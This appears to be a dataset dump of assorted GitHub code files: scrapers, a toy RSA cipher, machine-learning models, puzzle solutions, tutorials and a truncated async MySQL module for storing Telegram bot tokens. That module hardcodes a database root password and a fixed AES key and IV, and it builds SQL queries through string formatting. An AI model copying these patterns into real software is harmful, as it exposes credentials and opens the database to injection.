+{"seq_id":"28833424054","text":"from bs4 import BeautifulSoup\nimport requests\n\n# find the most upvoted entry\n\nresponse = requests.get(\"https://news.ycombinator.com\")\nyc_web_page = response.text\n\nsoup = BeautifulSoup(yc_web_page, \"html.parser\")\n\narticles = soup.find_all(name=\"a\", rel=\"noreferrer\")\n\n\narticle_link = []\narticle_text = []\n\nfor article_tag in articles:\n article_link.append(article_tag.get(\"href\"))\n article_text.append(article_tag.getText())\n\nupvote =[score.getText() for score in soup.find_all(name=\"span\", class_=\"score\")]\narticle_upvote = [int(score.split()[0]) for score in upvote]\n\n# print(article_text)\n# print(article_link)\n# print(article_upvote)\n\n\nindex_of_max = article_upvote.index(max(article_upvote))\nprint(index_of_max+1)\nprint(article_text[index_of_max])\nprint(article_link[index_of_max])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ulkat/100daysofpython","sub_path":"day-45 Web Scraping/bs4-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13084985930","text":"def encode(p):\n m = ''\n for i in range(len(p)):\n a = ord(p[i])\n if a == 32:\n a = 64\n a -= 64\n if a == 0:\n m += '00'\n elif a < 10:\n m += '0' + str(a)\n else:\n m += str(a)\n\n return m\n\ndef decode(p):\n m = ''\n\n for i in range(0, len(p), 2):\n a = int(p[i:i+2]) + 64\n if a == 64:\n a = 32\n m += chr(a)\n\n return m\n\n\ndef encipher(p, n, pk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(pk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\ndef decipher(p, n, sk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(sk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\n\nplainText = 'SAVE PRIVATE RYAN '\n\nN = 3713\n# 공개키\nS = 97\n# 비밀키\nP = 37\nplainMessage = encode(plainText)\n\nprint('평문 : ', plainMessage)\ncipherMessage = encipher(plainMessage, N, P)\nprint('암호문 : ', cipherMessage)\ndecipherMessage = decipher(cipherMessage, N, S)\nprint('복호문 : ', decipherMessage)\n\ndecodeMessage = decode(decipherMessage)\nprint('��호된 내용 : ', decodeMessage)\n","repo_name":"EEDK/2020-2-INUCS-Algorithm","sub_path":"stringAlgorithm/RSAencipher.py","file_name":"RSAencipher.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10012430267","text":"def app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n data = environ['QUERY_STRING'].split('&')\n data = [item+'\\r\\n' for item in data]\n data = [item.encode() for item in data]\n status = '200 OK'\n response_headers = [\n ('Content-type','text/plain'),\n ]\n start_response(status, response_headers)\n return iter(data)\n","repo_name":"KostiganSavin/stepic-web","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12362960434","text":"# noqa: D205,D400\n\"\"\"\nData checks\n===========\n\nUtilities designed to check the validity of data inputs.\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport xarray as xr\n\nfrom .calendar import compare_offsets, parse_offset\nfrom .options import datacheck\nfrom .utils import ValidationError\n\n\n@datacheck\ndef check_freq(var: xr.DataArray, freq: str | Sequence[str], strict: bool = True):\n \"\"\"Raise an error if not series has not the expected temporal frequency or is not monotonically increasing.\n\n Parameters\n ----------\n var : xr.DataArray\n Input array.\n freq : str or sequence of str\n The expected temporal frequencies, using Pandas frequency terminology ({'A', 'M', 'D', 'H', 'T', 'S', 'L', 'U'})\n and multiples thereof. To test strictly for 'W', pass '7D' with `strict=True`.\n This ignores the start flag and the anchor (ex: 'AS-JUL' will validate against 'Y').\n strict : bool\n Whether multiples of the frequencies are considered invalid or not. With `strict` set to False, a '3H' series\n will not raise an error if freq is set to 'H'.\n \"\"\"\n if isinstance(freq, str):\n freq = [freq]\n exp_base = [parse_offset(frq)[1] for frq in freq]\n v_freq = xr.infer_freq(var.time)\n if v_freq is None:\n raise ValidationError(\n \"Unable to infer the frequency of the time series. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n v_base = parse_offset(v_freq)[1]\n if v_base not in exp_base or (\n strict and all(compare_offsets(v_freq, \"!=\", frq) for frq in freq)\n ):\n raise ValidationError(\n f\"Frequency of time series not {'strictly' if strict else ''} in {freq}. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n\n\ndef check_daily(var: xr.DataArray):\n \"\"\"Raise an error if not series has a frequency other that daily, or is not monotonically increasing.\n\n Notes\n -----\n This does not check for gaps in series.\n \"\"\"\n return check_freq(var, \"D\")\n","repo_name":"dougiesquire/xclim","sub_path":"xclim/core/datachecks.py","file_name":"datachecks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"70101000009","text":"\"\"\" Day 14: Reindeer Olympics\n\nAuthor: Ic4r0 - https://github.com/Ic4r0\n\nCreated: 10th December 2021\n\"\"\"\n\n# imports\nfrom utils.parse_input import parse_by_line\nfrom re import match\n\n\n# modules\ndef compute_space(reindeer: dict, max_time: int) -> int:\n \"\"\" Compute traveled distance of a single reindeer\n\n :param reindeer: dict containing info about reindeer\n :param max_time: observation period\n :return: numeric result\n \"\"\"\n distance = 0\n time = 0\n while time < max_time:\n if time + reindeer['time'] > max_time:\n distance += (max_time - time) * reindeer['speed']\n else:\n distance += reindeer['time'] * reindeer['speed']\n time += reindeer['time'] + reindeer['rest']\n return distance\n\n\ndef part_1(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 1st part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n distances = []\n for single_reindeer in reindeer.keys():\n distances.append(compute_space(reindeer[single_reindeer], max_time))\n return max(distances)\n\n\ndef part_2(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 2nd part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n reindeer_list = reindeer.keys()\n points = {single_reindeer: 0 for single_reindeer in reindeer_list}\n for second in range(1, max_time):\n results_by_seconds = []\n for single_reindeer in reindeer_list:\n results_by_seconds.append(compute_space(reindeer[single_reindeer], second))\n max_values_names = [\n list(reindeer_list)[idx] for idx, result in enumerate(results_by_seconds)\n if result == max(results_by_seconds)\n ]\n for name in max_values_names:\n points[name] += 1\n\n return max(points.values())\n\n\ndef day_14(selected_part: int = None, test: bool = False):\n \"\"\" Needed to select which part of the 14th day we want to execute\n\n :param selected_part: selected Advent of Code part of the 14th day\n :param test: flag to use test input\n \"\"\"\n input_list = parse_by_line(14, int_list=False, is_test=test)\n reindeer = dict()\n for line in input_list:\n matches = match(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.', line)\n name, speed, time, rest = matches.groups()\n reindeer[name] = {\n 'speed': int(speed),\n 'time': int(time),\n 'rest': int(rest),\n }\n\n if selected_part == 1 or not selected_part:\n result_part_1 = part_1(reindeer, is_test=test)\n print('The result of 1st part of the 14th day of AoC is: ' + str(result_part_1))\n if selected_part == 2 or not selected_part:\n result_part_2 = part_2(reindeer, is_test=test)\n print('The result of 2nd part of the 14th day of AoC is: ' + str(result_part_2))\n","repo_name":"Ic4r0/advent_of_code2015","sub_path":"days/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70545685449","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\n\nclass GraphAttentionLayer(nn.Module):\n\n def __init__(self, requires_grad=True):\n super(GraphAttentionLayer, self).__init__()\n if requires_grad:\n # unifrom initialization\n self.beta = Parameter(torch.Tensor(1).uniform_(\n 0, 1), requires_grad=requires_grad)\n else:\n self.beta = Variable(torch.zeros(1), requires_grad=requires_grad)\n\n def forward(self, x, adj, aff_cropping):\n\n norm2 = torch.norm(x, 2, 1).view(-1, 1)\n cos = torch.div(torch.mm(x, x.t()), torch.mm(norm2, norm2.t()) + 1e-7)\n\n mask = torch.zeros_like(aff_cropping).cuda()\n mask[aff_cropping == 0] = -1e9\n mask[cos<0] = -1e9\n cos = self.beta.cuda() * cos\n masked = cos + mask + 10 * adj\n\n # propagation matrix\n P = F.softmax(masked, dim=1)\n\n # attention-guided propagation\n output = torch.mm(P, x)\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (16 -> 16)'\n\n\nclass LinearLayer(nn.Module):\n\n def __init__(self, in_features, out_features, initializer=nn.init.xavier_uniform_):\n super(LinearLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(initializer(\n torch.Tensor(in_features, out_features)))\n\n def forward(self, input):\n # no bias\n return torch.mm(input, self.weight)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nclass A2GNN(nn.Module):\n\n def __init__(self, nfeat, nhid, nclass, nlayers, dropout_rate):\n super(A2GNN, self).__init__()\n\n self.layers = nlayers\n self.dropout_rate = dropout_rate\n\n self.embeddinglayer = LinearLayer(nfeat, nhid)\n nn.init.xavier_uniform_(self.embeddinglayer.weight)\n\n self.attentionlayers = nn.ModuleList()\n # for Cora dataset, the first propagation layer is non-trainable\n # and beta is fixed at 0\n self.attentionlayers.append(GraphAttentionLayer(requires_grad=True))\n for i in range(1, self.layers):\n self.attentionlayers.append(GraphAttentionLayer())\n\n self.outputlayer = LinearLayer(nhid, nclass)\n nn.init.xavier_uniform_(self.outputlayer.weight)\n\n def forward(self, x, adj, aff_cropping):\n x = F.relu(self.embeddinglayer(x))\n x = F.dropout(x, self.dropout_rate, training=self.training)\n\n for i in range(self.layers):\n x = self.attentionlayers[i](x, adj, aff_cropping)\n fts = x.clone()\n\n x = self.outputlayer(x)\n\n return x,fts\n","repo_name":"zbf1991/A2GNN","sub_path":"pygcn/A2GNN.py","file_name":"A2GNN.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"}
+{"seq_id":"39737261139","text":"#!/usr/bin/python\n# encoding: utf-8\n\n\"\"\"\n@author: Ian\n@contact:yongguiluo@hotmail.com\n@file: bilstm_seq2seq.py\n@time: 2019/3/11 17:02\n\"\"\"\nimport re\nimport numpy as np\nimport pandas as pd\nfrom mayiutils.file_io.pickle_wrapper import PickleWrapper as picklew\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, TimeDistributed, Input, Bidirectional\nfrom tensorflow.keras.models import Model, load_model\n\n\ndef clean(s): #整理一下数据,有些不规范的地方\n if '“/s' not in s:\n return s.replace(' ”/s', '')\n elif '”/s' not in s:\n return s.replace('“/s ', '')\n elif '‘/s' not in s:\n return s.replace(' ’/s', '')\n elif '’/s' not in s:\n return s.replace('‘/s ', '')\n else:\n return s\n\n\ndef get_xy(s):\n \"\"\"\n 获取word序列和label序列\n\n :param s:\n :return:\n (['“', '人', '们', '常', '说', '生', '活', '是', '一', '部', '教', '科', '书'],\n ['s', 'b', 'e', 's', 's', 'b', 'e', 's', 's', 's', 'b', 'm', 'e'])\n \"\"\"\n s = re.findall('(.)/(.)', s)\n # print(s)\n if s:\n s = np.array(s)\n return list(s[:, 0]), list(s[:, 1])\n\n\ndef trans_one(x):\n \"\"\"\n 把label ['s', 'b'...]转换为one-hot形式\n :param x:\n :return:\n \"\"\"\n _ = map(lambda y: tf.keras.utils.to_categorical(y,5), tag[x].values.reshape((-1,1)))\n _ = list(_)\n _.extend([np.array([[0,0,0,0,1]])]*(maxlen-len(x)))\n return np.array(_)\n#转移概率,单纯用了等概率\nzy = {'be':0.5,\n 'bm':0.5,\n 'eb':0.5,\n 'es':0.5,\n 'me':0.5,\n 'mm':0.5,\n 'sb':0.5,\n 'ss':0.5\n }\n\nzy = {i:np.log(zy[i]) for i in zy.keys()}\n\n\ndef viterbi(nodes):\n paths = {'b': nodes[0]['b'], 's': nodes[0]['s']}\n for l in range(1,len(nodes)):\n paths_ = paths.copy()\n paths = {}\n for i in nodes[l].keys():\n nows = {}\n for j in paths_.keys():\n if j[-1]+i in zy.keys():\n nows[j+i] = paths_[j]+nodes[l][i]+zy[j[-1]+i]\n k = np.argmax(list(nows.values()))\n paths[list(nows.keys())[k]] = list(nows.values())[k]\n return list(paths.keys())[np.argmax(paths.values())]\n\n\ndef simple_cut(s):\n if s:\n r = model.predict(np.array([list(chars[list(s)].fillna(0).astype(int))+[0]*(maxlen-len(s))]), verbose=False)[0][:len(s)]\n # print(type(r), r.shape, r[:2])\n # return\n r = np.log(r)\n nodes = [dict(zip(['s', 'b', 'm', 'e'], i[:4])) for i in r]\n t = viterbi(nodes)\n words = []\n for i in range(len(s)):\n if t[i] in ['s', 'b']:\n words.append(s[i])\n else:\n words[-1] += s[i]\n return words\n else:\n return []\n\n\nnot_cuts = re.compile(r'([\\da-zA-Z ]+)|[。,、?!.?,!]')\n\n\ndef cut_word(s):\n result = []\n j = 0\n for i in not_cuts.finditer(s):\n result.extend(simple_cut(s[j:i.start()]))\n result.append(s[i.start():i.end()])\n j = i.end()\n result.extend(simple_cut(s[j:]))\n return result\n\n\nif __name__ == '__main__':\n mode = 2\n chars = picklew.loadFromFile('chars.pkl')\n maxlen = 32\n if mode == 2:\n model = load_model('model.h5')\n simple_cut('苏剑林是科学空间的博主')\n print(cut_word('苏剑林是科学空间的博主'))\n print(cut_word('你是真的遇到过报错了'))\n print(cut_word('列夫·托尔斯泰是俄罗斯一位著名的作家'))\n if mode == 1:\n \"\"\"\n train model\n \"\"\"\n s = open('msr_train.txt', encoding='gbk').read()\n s = s.split('\\r\\n')\n # print(s[0])\n s = ''.join(map(clean, s))\n s = re.split(r'[,。!?、]/[bems]', s)\n print(s[0])\n data = [] # 生成训练样本\n label = []\n for i in s:\n x = get_xy(i)\n if x:\n data.append(x[0])\n label.append(x[1])\n\n d = pd.DataFrame(index=range(len(data)))\n d['data'] = data\n d['label'] = label\n # print(d.head())\n \"\"\"\n 抛弃了多于32字的样本,这部分样本很少,事实上,用逗号、句号等天然分隔符分开后,句子很少有多于32字的。\n \"\"\"\n\n d = d[d['data'].apply(len) <= maxlen]\n d.index = range(len(d))\n \"\"\"\n 这次我用了5tag,在原来的4tag的基础上,加上了一个x标签,\n 用来表示不够32字的部分,比如句子是20字的,那么第21~32个标签均为x。\n \"\"\"\n tag = pd.Series({'s': 0, 'b': 1, 'm': 2, 'e': 3, 'x': 4})\n chars = [] # 统计所有字,跟每个字编号\n for i in data:\n chars.extend(i)\n # 按照词频出现的高低给word编号\n chars = pd.Series(chars).value_counts().sort_values(ascending=False)\n chars[:] = range(1, len(chars) + 1)\n picklew.dump2File(chars, 'chars.pkl')\n # # 生成适���模型输入的格式\n # d['x'] = d['data'].apply(lambda x: np.array(list(chars[x]) + [0] * (maxlen - len(x))))\n #\n # d['y'] = d['label'].apply(trans_one)\n\n # picklew.dump2File(d, 'd.pkl')\n d = picklew.loadFromFile('d.pkl')\n # 设计模型\n word_size = 128\n maxlen = 32\n\n sequence = Input(shape=(maxlen,), dtype='int32')\n embedded = Embedding(len(chars) + 1, word_size, input_length=maxlen, mask_zero=True)(sequence)\n blstm = Bidirectional(LSTM(64, return_sequences=True), merge_mode='sum')(embedded)\n output = TimeDistributed(Dense(5, activation='softmax'))(blstm)\n model = Model(inputs=sequence, outputs=output)\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n print(model.summary())\n \"\"\"\n _________________________________________________________________\n Layer (type) Output Shape Param # \n =================================================================\n input_1 (InputLayer) (None, 32) 0 \n _________________________________________________________________\n embedding (Embedding) (None, 32, 128) 660864 \n _________________________________________________________________\n bidirectional (Bidirectional (None, 32, 64) 98816 \n _________________________________________________________________\n time_distributed (TimeDistri (None, 32, 5) 325 \n =================================================================\n Total params: 760,005\n Trainable params: 760,005\n Non-trainable params: 0\n _________________________________________________________________\n None\n \"\"\"\n batch_size = 1024\n history = model.fit(np.array(list(d['x'])), np.array(list(d['y'])).reshape((-1, maxlen, 5)), batch_size=batch_size,\n nb_epoch=50)\n model.save('model.h5')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mayi140611/mayiutils","sub_path":"apps/lstmtest/bilstm_seq2seq.py","file_name":"bilstm_seq2seq.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70253672008","text":"#!/usr/bin/python3\n\"\"\"a module with a prime number game\"\"\"\n\n\ndef is_prime(num):\n \"\"\"checks if the number us prime\"\"\"\n if num <= 1:\n return False\n if num <= 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n i = 5\n while i * i <= num:\n if num % i == 0 or num % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\ndef isWinner(x, nums):\n \"\"\"determines the winner\"\"\"\n maria_wins = 0\n ben_wins = 0\n\n for n in nums:\n # Count the number of prime numbers in the range [1, n]\n prime_count = sum(1 for i in range(1, n + 1) if is_prime(i))\n\n # If the number of prime numbers is odd, Maria wins\n # If the number of prime numbers is even, Ben wins\n if prime_count % 2 == 1:\n maria_wins += 1\n else:\n ben_wins += 1\n\n if maria_wins > ben_wins:\n return \"Maria\"\n elif ben_wins > maria_wins:\n return \"Ben\"\n else:\n return None\n","repo_name":"Mmah-Zombo/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2478278175","text":"import json\r\nimport os\r\nfrom PIL import Image\r\n\r\n#loading data from config.json\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\nprint(config['new_size_ratio'])\r\n\r\n\r\ndef get_size_format(b, factor=1024, suffix=\"B\"):\r\n \"\"\"\r\n Scale bytes to its proper byte format\r\n e.g:\r\n 1253656 => '1.20MB'\r\n 1253656678 => '1.17GB'\r\n \"\"\"\r\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\"]:\r\n if b < factor:\r\n return f\"{b:.2f}{unit}{suffix}\"\r\n b /= factor\r\n return f\"{b:.2f}Y{suffix}\"\r\n\r\n\r\ndef compress_img(image_name, new_size_ratio=config['new_size_ratio'], quality=config['quality'], width=config['width'], height=config['height'], to_jpg=True):\r\n print(new_size_ratio,quality,width,height)\r\n # load the image to memory\r\n img = Image.open(image_name)\r\n # print the original image shape\r\n print(\"[*] Image shape:\", img.size)\r\n # get the original image size in bytes\r\n image_size = os.path.getsize(image_name)\r\n # print the size before compression/resizing\r\n print(\"[*] Size before compression:\", get_size_format(image_size))\r\n if new_size_ratio == 1.0:\r\n # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size\r\n img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n elif width and height:\r\n # if width and height are set, resize with them instead\r\n img = img.resize((width, height), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n # split the filename and extension\r\n filename, ext = os.path.splitext(image_name)\r\n # make new filename appending _compressed to the original file name\r\n\r\n new_filename ='a_compress.jpg' \r\n a=config['output_file_image'] + new_filename\r\n # save the image with the corresponding quality and optimize set to True\r\n img.save(f\"{config['output_file_image']}/a.jpg\", quality=quality, optimize=True)\r\n print(\"[+] New file saved:\", new_filename)\r\n# calling the function\r\ncompress_img(config['input_file_image'])","repo_name":"sumit-iot/video_and_image_compression","sub_path":"Compress_image.py","file_name":"Compress_image.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32492983534","text":"# The OpenStack Way\nfrom oslo import messaging\nfrom oslo.config import cfg\n\nTRANSPORT = None\nNOTIFIER = None\n\ndef init(conf):\n\tglobal TRANSPORT, NOTIFIER\n\tTRANSPORT = messaging.get_transport(conf)\n\tdriver = 'messaging'\n\tNOTIFIER = messaging.Notifier(TRANSPORT, driver=driver)\n\ndef get_client(topic):\n\tassert TRANSPORT is not None\n\ttarget = messaging.Target(topic=topic)\n\treturn messaging.RPCClient(TRANSPORT, target)\n\n\ndef get_server(topic, endpoints):\n\tassert TRANSPORT is not None\n\tassert type(endpoints) is list\n\tcfg.CONF.import_opt('host', 'sim.nova.compute')\n\ttarget = messaging.Target(topic=topic, server=cfg.CONF.host)\n\treturn messaging.get_rpc_server(TRANSPORT, target, endpoints)\n\ndef get_notifier(publisher_id):\n\t\tassert NOTIFIER is not None\n\t\treturn NOTIFIER.prepare(publisher_id=publisher_id)\n","repo_name":"affear/smart_alloc_simulator","sub_path":"sim/nova/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"8461174519","text":"# P183\n# 变量作用域:变量生效的范围,主要分为 局部变量 和 全局变量\ndef testA():\n a = 100\n print(a) # 函数内部访问,则可以访问变量 a\n\ntestA() # 100\n# print(a)\n\n# NameError: name 'a' is not defined\n# a 是一个局部变量不能全局生效,故显示a没有被定义\n\nx = 10\ndef f():\n x = 5\n print('f内部: x=', x)\n return x * x\n\nprint('f()=', f())\n# f内部: x= 5 # 局部变量和全局变量同名时,局部变量屏蔽全局变量,简称“局部优先”\n# f()= 25 # 若 x = 5 不存在,则 x 可以访问外部变量此时 x = 10,局部变量可以访问全局变量,全局变量不可以访问局部变量\nprint('f外部: x=', x) \n# f外部: x= 10\n\n# 如何在将局部变量变为全局变量?修改局部变量为全局变量\n'''\n语法: \nglobal 变量\n变量 = 数值'''\na = 100\ndef testA():\n global a # global 将 a 定义为了全局变量,位置位于 a = 100 下面,所以 a 的值新定义为了 200\n a = 200\n print(a)\n\nprint(a)\n# 100 \ntestA()\n# 200\nprint(a)\n# 200\n\n# 返回值作为参数传递\ndef test1():\n return 50\n\ndef test2(num):\n print(num)\n\nresult = test1()\ntest2(result)\n# 50","repo_name":"luguodezhangsan/VsCode_Python","sub_path":"050-函数变量作用域.py","file_name":"050-函数变量作用域.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14764925989","text":"from tkinter import *\n\n\ndef qwer():\n user_inp = user.get()\n if user_inp == '1':\n text_win.insert(0.1, f'{type(user_inp)} - 1\\n')\n elif user_inp == '2':\n text_win.insert(0.0, f'{type(user_inp)} - 2\\n')\n else:\n text_win.insert(0.0, f'Вы ввели текст {type(user_inp)}\\n')\n\n\n\nwin = Tk()\nwin.geometry('500x500')\n\nuser = Entry(win)\nuser.pack()\n\nbtn = Button(win, text='проверить', command=qwer)\nbtn.pack()\n\nglobal text_win\ntext_win = Text(win)\ntext_win.pack()\n\nwin.mainloop()","repo_name":"FrodoB-Shire/programm_for_img","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14321288413","text":"n=int(input(\"enter which term you want to get?:-\"))\nsum=0\nk=1\nd=2\na=3\nfor i in range(1,n):\n\tprint(k,',',end='')\n\tk+=a\n\ta+=d\nprint(f'\\n{n}th term=',k)","repo_name":"Sur818/Coding-Projects","sub_path":"python programming/forloop97_nth term.py","file_name":"forloop97_nth term.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37065598864","text":"import asyncio\nimport aiomysql\n\nfrom .MessageTexts import *\nfrom ..secound.secound_constants import *\nfrom ..secound.Seller.const4seller import *\nfrom ..secound.Seller.constdb4dbseller import *\n\nasync def db4takjoy(flag_Update_Token, **kwargs):\n pre_secure = \"\"\"SET block_encryption_mode = 'aes-256-cbc'; \n SET @key_str = SHA2('My secret passphrase',512);\n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\"\" \n db2mem_citypost = (\"\"\"select AES_DECRYPT(`city_name`,@key_str, @init_vector), AES_DECRYPT(`post_purchase`,@key_str, @init_vector) from {table4citypost};\"\"\")\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n select4customer = (\"\"\"select AES_DECRYPT(user_id,@key_str, @init_vector),\n AES_DECRYPT(user_name,@key_str, @init_vector),\n AES_DECRYPT(first_name,@key_str, @init_vector),\n AES_DECRYPT(last_name,@key_str, @init_vector),\n AES_DECRYPT(Address,@key_str, @init_vector),\n AES_DECRYPT(Phone_Number,@key_str, @init_vector)\n from {table4customer};\"\"\")\n create_customer_table = (\"\"\"CREATE TABLE IF NOT EXISTS {table4customer}(\n `emp_nu` int(12) NOT NULL AUTO_INCREMENT,\n `user_id` Text NULL,\n `user_name` Text NULL,\n `first_name` Text NULL,\n `last_name` Text NULL,\n `Address` Text NULL,\n `Phone_Number` Text NULL,\n `city_dict` Text NULL,\n `Postal_code` Text NULL,\n PRIMARY KEY(emp_nu));\"\"\")\n update_token = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~';\n SET @ENCRYPT_Bot_id = '{Bot_id}';\n SET @ENCRYPT_Token = '{Token}';\n UPDATE Token_Takjoy set `Token` = AES_ENCRYPT(@ENCRYPT_Token, @key_str, @init_vector) where `Bot_id` = AES_ENCRYPT(@ENCRYPT_Bot_id, @key_str, @init_vector);\"\"\")\n\n loop = asyncio.get_event_loop()\n conn = await aiomysql.connect(host='127.0.0.1', port=3306, \n user='root', password=\"lk1l,tr3ldal5\",charset = \"utf8\",\n db='Test', loop=loop)\n\n cur = await conn.cursor()\n async with conn.cursor() as cur: \n await cur.execute(sql)\n await conn.commit()\n if flag_Update_Token == 0:\n cur = await conn.cursor()\n insert_table = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \n SET @ENCRYPT_User_id = '{User_id}'; \n SET @ENCRYPT_Bot_id = '{Bot_id}'; \n SET @ENCRYPT_Token = '{Token}'; \n INSERT IGNORE INTO Token_Takjoy(User_id, Token, Bot_Date, Bot_ID) \n VALUES(AES_ENCRYPT(@ENCRYPT_User_id,@key_str, @init_vector), \n AES_ENCRYPT(@ENCRYPT_Token,@key_str, @init_vector), \n (CURDATE() + interval {Daysetting} day), \n AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector));\"\"\")\n \n len_flag = len(saveindb)\n for i in range(0,len_flag):\n my_user_id = saveindb.pop()\n await cur.execute(insert_table.format(User_id = str(my_user_id),\n Token = true_token[my_user_id], \n Bot_id = kwargs[\"Bot_id\"], \n Daysetting = int(kwargs[\"Daysetting\"])))\n await conn.commit() \n\n elif flag_Update_Token == 1: \n await cur.execute(befor_select_all)\n await conn.commit()\n await cur.execute(select_all)\n await conn.commit()\n result_db = await cur.fetchall()\n await cur.execute(select4botmaker)\n await conn.commit()\n curbing_repeat_bot = await cur.fetchall()\n for row in curbing_repeat_bot:\n if row[0] and row[1]:\n dic_bot_user_id[row[0].decode('utf8')] = row[1].decode('utf8')\n dic_user_id_bot[row[1].decode('utf8')] = row[0].decode('utf8')\n if row[1].decode('utf8') not in list_bot_id:\n list_bot_id.append(row[1].decode('utf8'))\n await cur.execute(select4chargebot)\n await conn.commit()\n db2mem4charge_bot = await cur.fetchall()\n for row in db2mem4charge_bot:\n if row[1] and row[0]:\n dic4charge_bot_id2token[row[1].decode('utf8')] = row[0].decode('utf8')\n\n for row in result_db:\n if row[1]:\n row1 = row[1].decode('utf8')\n row2 = row[2].decode('utf8')\n temp_bot_un = row[4].decode('utf8')\n temp_bot_date = row[3]\n if row1:\n if row1 not in dict4bot_ids4users:\n dict4bot_ids4users[row1] = []\n if temp_bot_un not in dict4bot_ids4users[row1]:\n dict4bot_ids4users[row1].append(temp_bot_un)\n\n Date_bot[temp_bot_un] = temp_bot_date\n user_id4owner[row2] = str(row1) + row2\n UNT_Dict[row[0]] = [row1, row2, temp_bot_date]\n await cur.execute(createtable4seller.format(table4seller = row[0]))\n await cur.execute(select_all_seller.format(table4seller = row[0]))\n await conn.commit()\n result_sellers = 